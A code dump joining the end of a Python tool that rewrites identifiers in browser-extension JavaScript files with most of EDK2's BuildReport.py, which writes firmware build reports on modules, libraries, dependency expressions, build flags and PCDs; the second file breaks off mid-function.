prep_results = self.prepare_js()
analysis_results = self.analyze_js(search_str, src_js_fn)
analysis_results["filename"] = src_js_fn
analysis_results["prepare_js"] = prep_results
if not exists("temp.js.json"):
cloak_results.append(analysis_results)
# self.ext.write_to_results(key_name, analysis_results, False)
continue
js = open("temp.js", "r").read()
js_str, edited_lines = self.do_replacements(js, id_map)
analysis_results["edited_lines"] = len(edited_lines)
# self.ext.write_to_results(key_name, analysis_results, False)
cloak_results.append(analysis_results)
if len(edited_lines) > 0:
jout = open("temp.js", "w")
jout.write("//Cloaked")
jout.write("//Edited line(s) {}\n".format(" ".join(str(x) for x in edited_lines)))
jout.write(js_str + "\n")
jout.close()
copyfile("temp.js", e.get_path + war_fn)
return cloak_results
def do_replacements(self, js_, id_map):
edited_lines = []
with open("temp.js.json", "r") as jf:
search_results = json.load(jf)
#print("\nSearch Res={}:".format(search_results))
js_lines = []
if "matches" in search_results:
js_lines = open("temp.js", "r").read().split("\n")
for sr_k, res in search_results["matches"].items():
#print("{} == {}".format(sr_k, res))
for ev in res:
line_no = ev['lineNumber'] - 1
if line_no < len(js_lines):
the_line = js_lines[line_no]
if sr_k[1:] in the_line:
the_line = the_line.replace(sr_k[1:], id_map[sr_k])
js_lines[line_no] = the_line
edited_lines.append(line_no)
else:
with open("data/line_not_written.json","a") as jf:
json.dump({"results":ev, "line": js_lines[line_no], "appid": self.ext.getappid()})
return "\n".join(js_lines), edited_lines
class NonBlockingStreamReader:
def __init__(self, stream):
'''
stream: the stream to read from.
Usually a process' stdout or stderr.
'''
self._s = stream
self._q = Queue()
self._finished = False
def _populateQueue(stream, queue):
'''
Collect lines from 'stream' and put them in 'quque'.
'''
while True:
try:
char = stream.read(1)
if char:
queue.put(char)
else:
self._finished = True
#raise UnexpectedEndOfStream
except ValueError as ve:
print("error reading from stream")
print(ve)
self._finished = True
pass
self._t = Thread(target = _populateQueue, args=(self._s, self._q))
self._t.daemon = True
self._t.start() #start collecting lines from the stream
@property
def is_finished(self):
return self._finished
def read(self, timeout = None):
try:
if self._finished:
return None
return self._q.get(block = timeout is not None, timeout=timeout)
except Empty:
return None
class UnexpectedEndOfStream(Exception):
pass
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
import edk2basetools.Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from edk2basetools.Common import EdkLogger
from edk2basetools.Common.Misc import SaveFileOnChange
from edk2basetools.Common.Misc import GuidStructureByteArrayToGuidString
from edk2basetools.Common.Misc import GuidStructureStringToGuidString
from edk2basetools.Common.BuildToolError import FILE_WRITE_FAILURE
from edk2basetools.Common.BuildToolError import CODE_ERROR
from edk2basetools.Common.BuildToolError import COMMAND_FAILURE
from edk2basetools.Common.BuildToolError import FORMAT_INVALID
from edk2basetools.Common.LongFilePathSupport import OpenLongFilePath as open
from edk2basetools.Common.MultipleWorkspace import MultipleWorkspace as mws
import edk2basetools.Common.GlobalData as GlobalData
from edk2basetools.AutoGen.ModuleAutoGen import ModuleAutoGen
from edk2basetools.Common.Misc import PathClass
from edk2basetools.Common.StringUtils import NormPath
from edk2basetools.Common.DataType import *
import collections
from edk2basetools.Common.Expression import *
from edk2basetools.GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s,\s*Type=\w+\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.append(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.ModuleArch = M.Arch
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "OUTPUT", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module Arch: %s" % self.ModuleArch)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet,self.FileGuid)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
for Name, Guid in StructPcdDict:
if (Name, Guid) not in Pa.Platform.Pcds:
Pcd = StructPcdDict[(Name, Guid)]
PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
